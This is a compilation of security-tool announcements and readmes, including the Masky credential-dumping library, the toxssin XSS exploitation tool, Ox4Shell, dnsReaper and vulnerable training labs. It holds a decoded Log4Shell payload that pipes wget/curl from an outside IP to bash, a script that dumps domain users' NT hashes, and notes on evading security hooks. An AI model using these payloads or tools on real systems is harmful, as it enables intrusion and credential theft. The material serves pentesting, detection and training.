Moreover, if you need to modify the agent, the C# code can be recompiled via a Visual Studio project located in agent/Masky.sln. It would requires .NET Framework 4 to be built.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.

For both usages, you need first to retrieve the FQDN of a CA server and its CA name deployed via an ADCS. This information can be easily retrieved via the certipy find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated roll-back of its intial ImagePath value, an unexpected error during Masky runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such unwanted stop.

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows to collect NT hashes, CCACHE and PFX of 3 distincts domain users from the sec.lab testing domain.

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to au thenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
# Define the authentication parameters
ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()

# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)

# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False

# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")

return True


if __name__ == "__main__":
dump_nt_hashes()

Its execution generate the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Acknowledgments



Erlik - Vulnerable Soap Service

By: Zion3R
29 August 2022 at 12:30


Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Informaion Disclosure
  • Command Inejction
  • Brute Force
  • Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install requirements.txt

Usage

sudo python3 vulnerable_soap.py

Exploiting Vulnerabilities

LFI

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py

SQL Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py

Informaion Disclosure

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py

Command Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py

Brute Force

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py

Deserialization

Code:

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py



Toxssin - An XSS Exploitation Command-Line Interface And Payload Generator

By: Zion3R
28 August 2022 at 12:30


toxssin is an open-source penetration testing tool that automates the process of exploiting Cross-Site Scripting (XSS) vulnerabilities. It consists of an https server that works as an interpreter for the traffic generated by the malicious JavaScript payload that powers this tool (toxin.js).

This project started as (and still is) a research-based creative endeavor to explore the exploitability depth that an XSS vulnerability may introduce by using vanilla JavaScript, trusted certificates and cheap tricks.

Disclaimer: The project is quite fresh and has not been widely tested.

Video Presentation


Find screenshots here.

Capabilities

By default, toxssin intercepts:

  • cookies (if HttpOnly not present),
  • keystrokes,
  • paste events,
  • input change events,
  • file selections,
  • form submissions,
  • server responses,
  • table data (static as well as updates),

Most importantly, toxssin:

  • attempts to maintain XSS persistence while the user browses the website by intercepting http requests & responses and re-writing the document,
  • supports session management, meaning that, you can use it to exploit reflected as well as stored XSS,
  • supports custom JS script execution against sessions,
  • automatically logs every session.

Installation & Usage

git clone https://github.com/t3l3machus/toxssin
cd ./toxssin
pip3 install -r requirements.txt

To start toxssin.py, you will need to supply ssl certificate and private key files.

If you don't own a domain with a trusted certificate, you can issue and use self-signed certificates with the following command (although this won't take you far):

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

It is strongly recommended to run toxssin with a trusted certificate (see How to get a Valid Certificate in this document). That said, you can start the toxssin server like this:

# python3 toxssin.py -u https://your.domain.com -c /your/certificate.pem -k /your/privkey.pem

Visit the project's wiki for additional information.

XSS Exploitation Obstacles

In my experience, there are 4 major obstacles when it comes to Cross-Site Scripting attacks attempting to include external JS scripts:

  1. the "Mixed Content" error, which can be resolved by serving the JavaScript payload via https (even with a self-signed certificate).
  2. the "NET::ERR_CERT_AUTHORITY_INVALID" error, which indicates that the server's certificate is untrusted / expired and can be bypassed by using a certificate issued by a trusted Authority.
  3. Cross-origin resource sharing (CORS), which is handled appropriately by the toxssin server.
  4. Content-Security-Policy header with the script-src set to specific domain(s) only will block scripts with cross-domain src from loading. Toxssin relies on the eval() function to deliver its poison, so, if the website has a CSP and the unsafe-eval source expression is not specified in the script-src directive, the attack will most likely fail (i'm working on a second poison delivery method to work around this).

Note: The "Mixed Content" error can of course occur when the target website is hosted via http and the JavaScript payload via https. This limits the scope of toxssin to https only webistes, as (by default) toxssin is started with ssl only.

How to get a Valid Certificate

First, you need to own a domain name. The fastest and most economic way to get one (in my knowledge) is via a cheap domain registrar service (e.g. https://www.namecheap.com/). Search for a random string domain name (e.g. "fvcm98duf") and check the less popular TLDs, like .xyz, as they will probably cost around 3$ per year.

After you purchase a domain name, you can use certbot (Let's Encrypt) to get a trusted certificate in 5 minutes or less:

  1. Append an A record to your Domain's DNS settings so that it points to your server ip,
  2. Follow certbots official instructions.

Tip: Don't install and run certbot on your own, you might get unexpected errors. Stick with the instructions.

Changelog

2022-06-19 - Added the exec prompt command (you can now execute custom JS scripts against a session).
2022-06-23 - I added two simple, dirty scripts as templates for testing the exec prompt command. I also fixed the cmd prompt's backward history access and made some improvements.

Future

The idea is to make it sharper, more reliable and expand its capabilities. Currently, i'm working on improving file captures.



Rekono - Execute Full Pentesting Processes Combining Multiple Hacking Tools Automatically

By: Zion3R
27 August 2022 at 12:30


Rekono combines other hacking tools and its results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions will be sent to the user via email or Telegram notifications and also can be imported in Defect-Dojo if an advanced vulnerability management is needed. Moreover, Rekono includes a Telegram bot that can be used to perform executions easily from anywhere and using any device.


Features

  • Combine hacking tools to create pentesting processes
  • Execute pentesting processes
  • Execute pentesting tools
  • Review findings and receive them via email or Telegram notifications
  • Use Defect-Dojo integration to import the findings detected by Rekono
  • Execute tools and processes from Telegram Bot
  • Wordlists management

Why Rekono?

Do you ever think about the steps that you follow when start a pentesting? Probably you start performing some OSINT tasks to gather public information about the target. Then, maybe you run hosts discovery and ports enumeration tools. When you know what the target exposes, you can execute more specific tools for each service, to get more information and maybe, some vulnerabilities. And finally, if you find the needed information, you will look for a public exploit to get you into the target machine. I know, I know, this is an utopic scenario, and in the most cases the vulnerabilities are found due to the pentester skills and not by scanning tools. But before using your skills, how many time do you spend trying to get as information as possible with hacking tools? Pro bably, too much.

Why not automate this process and focus on find vulnerabilities using your skills and the information that Rekono sends you?

The Rekono name comes from the Esperanto language where it means recon.

Supported tools

Thanks to all the contributors of these amazing tools!

Installation

Docker

Execute the following commands in the root directory of the project:

docker-compose build
docker-compose up -d

If you need more than one tool running at the same time, you can set the number of executions-worker instances:

docker-compose up -d --scale executions-worker=5

Go to https://127.0.0.1/

You can check the details in the Docker documentation. Specially, the initial user documentation

Using Rekono CLI

If your system is Linux, you can use rekono-cli to install Rekono in your system:

pip3 install rekono-cli
rekono install

After that, you can manage the Rekono services using the following commands:

rekono services start
rekono services stop
rekono services restart

Go to http://127.0.0.1:3000/

⚠️ Only for Linux environments.

⚠️ Docker is advised. Only use that for local and personal usage.

From Source

Check the installation from source in Rekono Wiki

Configuration

Check the configuration options in Rekono Wiki

License

Rekono is licensed under the GNU GENERAL PUBLIC LICENSE Version 3

Support

If you need help you can create a new support Issue or mail [email protected]



ReconPal - Leveraging NLP For Infosec

By: Zion3R
26 August 2022 at 12:30


Recon is one of the most important phases that seem easy but takes a lot of effort and skill to do right. One needs to know about the right tools, correct queries/syntax, run those queries, correlate the information, and sanitize the output. All of this might be easy for a seasoned infosec/recon professional to do, but for rest, it is still near to magic. How cool it will be to ask a simple question like "Find me an open Memcached server in Singapore with UDP support?" or "How many IP cameras in Singapore are using default credentials?" in a chat and get the answer?

The integration of GPT-3, deep learning-based language models to produce human-like text, with well-known recon tools like Shodan, is the foundation of ReconPal. ReconPal also supports using voice commands to execute popular exploits and perform reconnaissance.


Built With

  • OpenAI GPT-3
  • Shodan API
  • Speech-to-Text
  • Telegram Bot
  • Docker Containers
  • Python 3

Getting Started

To get ReconPal up and running, follow these simple steps.

Prerequisites

Installation

  1. Clone the repo

    git clone https://github.com/pentesteracademy/reconpal.git
  2. Enter your OPENAI, SHODAN API keys, and TELEGRAM bot token in docker-compose.yml

    OPENAI_API_KEY=<Your key>
    SHODAN_API_KEY=<Your key>
    TELEGRAM_BOT_TOKEN=<Your token>
  3. Start reconpal

    docker-compose up

Usage

Open the telegram app and select the created bot to use ReconPal.

  1. Click on start or just type in the input box.
/start
  1. Register the model.
/register
  1. Test the tool with some commands.
scan 10.0.0.8

Tool featured at

Contributors

Jeswin Mathai, Senior Security Researcher, INE [email protected]

Nishant Sharma, Security Research Manager, INE [email protected]

Shantanu Kale, Cloud Developer, INE [email protected]

Sherin Stephen, Cloud Developer, INE [email protected]

Sarthak Saini (Ex-Pentester Academy)

Documentation

For more details, refer to the "ReconPal.pdf" PDF file. This file contains the slide deck used for presentations.

Screenshots

Starting reconpal and registering model

Finder module in action

Scanner module in action

Attacker module in action

Voice Support

License

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License v2 as published by the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.



dBmonster - Track WiFi Devices With Their Recieved Signal Strength

By: Zion3R
25 August 2022 at 12:30


With dBmonster you are able to scan for nearby WiFi devices and track them trough the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values will be plotted to a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self made antenna works the best (antenna radiation patterns).


Features on Linux and MacOS

Feature Linux MacOS
Listing WiFi interfaces
Track & scan on 2.4GHz
Track & scan on 5GHz
Scanning for AP
Scanning for STA
Beep when device found

Installation

git clone https://github.com/90N45-d3v/dBmonster
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python requirements.py

# Start dBmonster
sudo python dBmonster.py

Has been successfully tested on...

Platform
WiFi Adapter
Kali Linux ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna
MacOS Monterey Internal card 802.11 a/b/g/n/ac (MBP 2019)
* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor-mode on the internal wifi card from MacOS with the airport utility from Apple. Somehow, wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark’s workaround, there are many issues running dBmonster on MacOS. After some time, it could freeze and/or you have to stop dBmonster/Tshark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Look if there are any processes, named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on twitter, if you have anymore problems

Working on...

  • Capture signal strength data for offline graphs
  • Generate graphs from normal wireshark.pcapng file
  • Generate multiple graphs in one coordinate system

Additional information

  • If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
  • dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
  • If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the README.md


Ox4Shell - Deobfuscate Log4Shell Payloads With Ease

By: Zion3R
24 August 2022 at 12:30


Deobfuscate Log4Shell payloads with ease.

Description

Since the release of the Log4Shell vulnerability (CVE-2021-44228), many tools were created to obfuscate Log4Shell payloads, making the lives of security engineers a nightmare.

This tool intends to unravel the true contents of obfuscated Log4Shell payloads.

For example, consider the following obfuscated payload:

${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:[email protected][)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:[email protected]@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:[email protected]:-z}3z${uY)u:7S2)P4ihH:[email protected]:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}

After running Ox4Shell, it would transform into an intuitive and readable form:

${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}

This tool also aids to identify and decode base64 commands For example, consider the following obfuscated payload:

${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}

After running Ox4Shell, the tool reveals the attacker’s intentions:

${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash

We recommend running Ox4Shell with a provided file (-f) rather than an inline payload (-p), because certain shell environments will escape important characters, therefore will yield inaccurate results.

Usage

To run the tool simply:

~/Ox4Shell » python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)

____ _ _ _____ _ _ _
/ __ \ | || | / ____| | | | |
| | | |_ _| || || (___ | |__ ___| | |
| | | \ \/ /__ _\___ \| '_ \ / _ \ | |
| |__| |> < | | ____) | | | | __/ | |
\____//_/\_\ |_||_____/|_| |_|\___|_|_|

Ox4Shell - Deobfuscate Log4Shell payloads with ease.
Created by https://oxeye.io

General:
-h, --help Show this help message and exit
-d, --debug Enable debug mode (default: False)
-m MOCK, --mock MOCK The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
--max-depth MAX_DEPTH
The ma ximum number of iteration to perform on a given payload (default: 150)
--decode-base64 Payloads containing base64 will be decoded (default: False)

Targets:
Choose which target payloads to run Ox4Shell on

-p PAYLOAD, --payload PAYLOAD
A single payload to deobfuscate, make sure to escape '$' signs (default: None)
-f FILE, --file FILE A file containing payloads delimited by newline (default: None)

Mock Data

The Log4j library has a few unique lookup functions, which allow users to look up environment variables, runtime information on the Java process, and so forth. This capability grants threat actors the ability to probe for specific information that can uniquely identify the compromised machine they targeted.

Ox4Shell uses the mock.json file to insert common values into certain lookup function, for example, if the payload contains the value ${env:HOME}, we can replace it with a custom mock value.

The default set of mock data provided is:

{
"hostname": "ip-127.0.0.1",
"env": {
"aws_profile": "staging",
"user": "ubuntu",
"pwd": "/opt/",
"path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
},
"sys": {
"java.version": "16.0.2",
"user.name": "ubuntu"
},
"java": {
"version": "Java version 16.0.2",
"runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",
"vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",
"os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",
"locale": "default locale: en_US, platform encoding: UTF-8",
"hw": "processors: 1, architecture: amd64-64"
}
}

As an example, we can deobfuscate the following payload using the Ox4Shell's mocking capability:

~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.\${env:AWS_PROFILE}.malicious.server/a}"  
${jndi:ldap://16.0.2.staging.malicious.server/a}

Authors

License

The source code for the project is licensed under the MIT license, which you can find in the LICENSE file.



System Informer - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware

By: Zion3R
23 August 2022 at 12:30

System Informer

A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware. Brought to you by Winsider Seminars & Solutions, Inc.

Project Website - Project Downloads


System requirements

Windows 7 or higher, 32-bit or 64-bit.

Features

  • A detailed overview of system activity with highlighting.
  • Graphs and statistics allow you quickly to track down resource hogs and runaway processes.
  • Can't edit or delete a file? Discover which processes are using that file.
  • See what programs have active network connections, and close them if necessary.
  • Get real-time information on disk access.
  • View detailed stack traces with kernel-mode, WOW64 and .NET support.
  • Go beyond services.msc: create, edit and control services.
  • Small, portable and no installation required.
  • 100% Free Software (MIT)

Building the project

Requires Visual Studio (2022 or later).

Execute build_release.cmd located in the build directory to compile the project or load the SystemInformer.sln and Plugins.sln solutions if you prefer building the project using Visual Studio.

You can download the free Visual Studio Community Edition to build the System Informer source code.

See the build readme for more information or if you're having trouble building.

Enhancements/Bugs

Please use the GitHub issue tracker for reporting problems or suggesting new features.

Settings

If you are running System Informer from a USB drive, you may want to save System Informer's settings there as well. To do this, create a blank file named "SystemInformer.exe.settings.xml" in the same directory as SystemInformer.exe. You can do this using Windows Explorer:

  1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
  2. Right-click in the folder and choose New > Text Document.
  3. Rename the file to SystemInformer.exe.settings.xml (delete the ".txt" extension).

Plugins

Plugins can be configured from Options > Plugins.

If you experience any crashes involving plugins, make sure they are up to date.

Disk and Network information provided by the ExtendedTools plugin is only available when running System Informer with administrative rights.



RPCMon - RPC Monitor Tool Based On Event Tracing For Windows

By: Zion3R
22 August 2022 at 12:30

A GUI tool for scanning RPC communication through Event Tracing for Windows (ETW). The tool was published as part of a research on RPC communication between the host and a Windows container.

Overview

RPCMon can help researchers to get a high level view over an RPC communication between processes. It was built like Procmon for easy usage, and uses James Forshaw .NET library for RPC. RPCMon can show you the RPC functions being called, the process who called them, and other relevant information.
RPCMon uses a hardcoded RPC dictionary for fast RPC information processing which contains information about RPC modules. It also has an option to build an RPC database so it will be updated from your computer in case some details are missing in the hardcoded RPC dictionary.

Usage

Double click the EXE binary and you will get the GUI Windows.
RPCMon needs a DB to be able to get the details on the RPC functions, without a DB you will have missing information.
To load the DB, press on DB -> Load DB... and choose your DB. You can a DB we added to this project: /DB/RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json.

Features

  • A detailed overview of RPC functions activity.
  • Build an RPC database to parse RPC modules or use hardcoded database.
  • Filter\highlight rows based on cells.
  • Bold specific rows.

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get the RPC functions.

License

Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References:

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



Concealed_Code_Execution - Tools And Technical Write-Ups Describing Attacking Techniques That Rely On Concealing Code Execution On Windows

By: Zion3R
21 August 2022 at 12:30


Hunt & Hackett presents a set of tools and technical write-ups describing attacking techniques that rely on concealing code execution on Windows. Here you will find explanations of how these techniques work, receive advice on detection, and get sample source code for testing your detection coverage.


Content

This repository covers two classes of attacking techniques that extensively use internal Windows mechanisms plus provides suggestions and tools for detecting them:

  • Process Tampering - a set of techniques that conceal the code on the scale of an entire process.
  • Code Injection - a collection of tricks that allow executing code as part of other processes without interfering with their functionality.
  • Detection - a compilation of recommendations for defending against various techniques for concealing code execution.

The core values of the project:

  • The systematic approach. This repository includes more than just a collection of tools or links to external resources. Each subject receives a detailed explanation of the underlying concepts; each specific case gets classified into generic categories.
  • Proof-of-concept tooling. The write-ups are accompanied by example projects in C that demonstrate the use of the described facilities in practice.
  • Beginner to professional. You don't need to be a cybersecurity expert to understand the concepts we describe. Yet, even professionals in the corresponding domain should find the content valuable and educational because of the attention to detail and pitfalls.

Implementation

One final distinctive feature of this project is the extensive use of Native API throughout the samples. Here is the motivation for this choice:

  1. Functionality. Some operations required for the most advanced techniques (such as Process Tampering) are not exposed via other APIs.
  2. Control. Being the lowest level of interaction with the operating system, it provides the most control over its behavior. The Win32 API is implemented on top of Native API, so whatever is possible to achieve with the former is also possible with the latter.
  3. Availability. Being exposed by ntdll.dll, Native API is available in all processes, including the system ones.
  4. Consistency. The interfaces exposed by this API are remarkably consistent. After learning the fundamental design choices, it becomes possible to correctly predict the majority of function prototypes just from the API's name.
  5. Resistance to hooking. It is substantially easier to remove or bypass user-mode hooks when using Native API, partially blinding security software. There are no lower-level libraries that might be patched, so unhooking becomes as simple as loading a second instance of ntdll.dll and redirecting the calls there.

Compiling Remarks

The sample code uses the Native API headers provided by the PHNT project. Make sure to clone the repository using the git clone --recurse-submodules command to fetch this dependency. Alternatively, you can use git submodule update --init after cloning the repository.

To build the projects included with the repository, you will need a recent version of Windows SDK. If you use Visual Studio, please refer to the built-in SDK installation. Alternatively, you can also use the standalone build environment of EWDK. To compile all tools at once, use MSBuild AllTools.sln /t:build /p:configuration=Release /p:platform=x64.



dnsReaper - Subdomain Takeover Tool For Attackers, Bug Bounty Hunters And The Blue Team!

By: Unknown
20 August 2022 at 12:30


DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!

We can scan around 50 subdomains per second, testing each one with over 50 takeover signatures. This means most organisations can scan their entire DNS estate in less than 10 seconds.


You can use DNS Reaper as an attacker or bug hunter!

You can run it by providing a list of domains in a file, or a single domain on the command line. DNS Reaper will then scan the domains with all of its signatures, producing a CSV file.

You can use DNS Reaper as a defender!

You can run it by letting it fetch your DNS records for you! Yes that's right, you can run it with credentials and test all your domain config quickly and easily. DNS Reaper will connect to the DNS provider and fetch all your records, and then test them.

We currently support AWS Route53, Cloudflare, and Azure. Documentation on adding your own provider can be found here

You can use DNS Reaper as a DevSecOps Pro!

Punk Security are a DevSecOps company, and DNS Reaper has its roots in modern security best practice.

You can run DNS Reaper in a pipeline, feeding it a list of domains that you intend to provision, and it will exit Non-Zero if it detects a takeover is possible. You can prevent takeovers before they are even possible!

Usage

To run DNS Reaper, you can use the docker image or run it with python 3.10.

Findings are returned in the output and more detail is provided in a local "results.csv" file. We also support json output as an option.

Run it with docker

docker run punksecurity/dnsreaper --help

Run it with python

pip install -r requirements.txt
python main.py --help

Common commands

  • Scan AWS account:

    docker run punksecurity/dnsreaper aws --aws-access-key-id <key> --aws-access-key-secret <secret>

    For more information, see the documentation for the aws provider

  • Scan all domains from file:

    docker run -v $(pwd):/etc/dnsreaper punksecurity/dnsreaper file --filename /etc/dnsreaper/<filename>

  • Scan single domain

    docker run punksecurity/dnsreaper single --domain <domain>

  • Scan single domain and output to stdout:

    You should either redirect the stderr output or save stdout output with >

    docker run punksecurity/dnsreaper single --domain <domain> --out stdout --out-format=json > output

Full usage

          ____              __   _____                      _ __
/ __ \__ ______ / /__/ ___/___ _______ _______(_) /___ __
/ /_/ / / / / __ \/ //_/\__ \/ _ \/ ___/ / / / ___/ / __/ / / /
/ ____/ /_/ / / / / ,< ___/ / __/ /__/ /_/ / / / / /_/ /_/ /
/_/ \__,_/_/ /_/_/|_|/____/\___/\___/\__,_/_/ /_/\__/\__, /
PRESENTS /____/
DNS Reaper ☠️

Scan all your DNS records for subdomain takeovers!

usage:
.\main.py provider [options]

output:
findings output to screen and (by default) results.csv

help:
.\main.py --help

providers:
> aws - Scan multiple domains by fetching them from AWS Route53
> azure - Scan multiple domains by fetching t hem from Azure DNS services
> bind - Read domains from a dns BIND zone file, or path to multiple
> cloudflare - Scan multiple domains by fetching them from Cloudflare
> file - Read domains from a file, one per line
> single - Scan a single domain by providing a domain on the commandline
> zonetransfer - Scan multiple domains by fetching records via DNS zone transfer

positional arguments:
{aws,azure,bind,cloudflare,file,single,zonetransfer}

options:
-h, --help Show this help message and exit
--out OUT Output file (default: results) - use 'stdout' to stream out
--out-format {csv,json}
--resolver RESOLVER
Provide a custom DNS resolver (or multiple seperated by commas)
--parallelism PARALLELISM
Number of domains to test in parallel - too high and you may see odd DNS results (default: 30)
--disable-probable Do not check for probable conditions
--enable-unlikely Check for more conditions, but with a high false positive rate
--signature SIGNATURE
Only scan with this signature (multiple accepted)
--exclude-signature EXCLUDE_SIGNATURE
Do not scan with this signature (multiple accepted)
--pipeline Exit Non-Zero on detection (used to fail a pipeline)
-v, --verbose -v for verbose, -vv for extra verbose
--nocolour Turns off coloured text

aws:
Scan multiple domains by fetching them from AWS Route53

--aws-access-key-id AWS_ACCESS_KEY_ID
Optional
--aws-access-key-secret AWS_ACCESS_KEY_SECRET
Optional

azure:
Scan multiple domains by fetching them from Azure DNS services

--az-subscription-id AZ_SUBSCRIPTION_ID
Required
--az-tenant-id AZ_TENANT_ID
Required
--az-client-id AZ_CLIENT_ID
Required
--az-client-secret AZ_CLIENT_SECRET
Required

bind:
Read domains from a dns BIND zone file, or path to multiple

--bind-zone-file BIND_ZONE_FILE
Required

cloudflare:
Scan multiple domains by fetching them from Cloudflare

--cloudflare-token CLOUDFLARE_TOKEN
Required

file:
Read domains from a file, one per line

--filename FILENAME Required

single:
Scan a single domain by providing a domain on the commandline

--domain DOMAIN Required

zonetransfer:
Scan multiple domains by fetching records via DNS zone transfer

--zonetransfer-nameserver ZONE TRANSFER_NAMESERVER
Required
--zonetransfer-domain ZONETRANSFER_DOMAIN
Required


crAPI - Completely Ridiculous API

By: Zion3R
19 August 2022 at 12:30


completely ridiculous API (crAPI) will help you to understand the ten most critical API security risks. crAPI is vulnerable by design, but you'll be able to safely run it to educate/train yourself.

crAPI is modern, built on top of a microservices architecture. When time has come to buy your first car, sign up for an account and start your journey. To know more about crAPI, please check crAPI's overview.


QuickStart Guide

Docker

You'll need to have Docker installed and running on your host system.

Using prebuilt images

You can use prebuilt images generated by our CI workflow.

  • To use the latest stable version.

    • Linux Machine
    curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

    docker-compose pull

    docker-compose -f docker-compose.yml --compatibility up -d
    • Windows Machine
    curl.exe -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/main/deploy/docker/docker-compose.yml

    docker-compose pull

    docker-compose -f docker-compose.yml --compatibility up -d
  • To use the latest development version

    • Linux Machine
    curl -o docker-compose.yml https://raw.githubusercontent.com/OWASP/crAPI/develop/deploy/docker/docker-compose.yml

    VERSION=develop docker-compose pull

    VERSION=develop docker-compose -f docker-compose.yml --compatibility up -d
    • Windows Machine
    Visit http://localhost:8888

    Note: All emails are sent to mailhog service by default and can be checked on http://localhost:8025 You can change the smtp configuration if required however all emails with domain example.com will still go to mailhog.

    Vagrant

    This option allows you to run crAPI within a virtual machine, thus isolated from your system. You'll need to have Vagrant and, for example VirtualBox installed.

    1. Clone crAPI repository
      $ git clone [REPOSITORY-URL]
    2. Start crAPI Virtual Machine
      $ cd deploy/vagrant && vagrant up
    3. Visit http://192.168.33.20

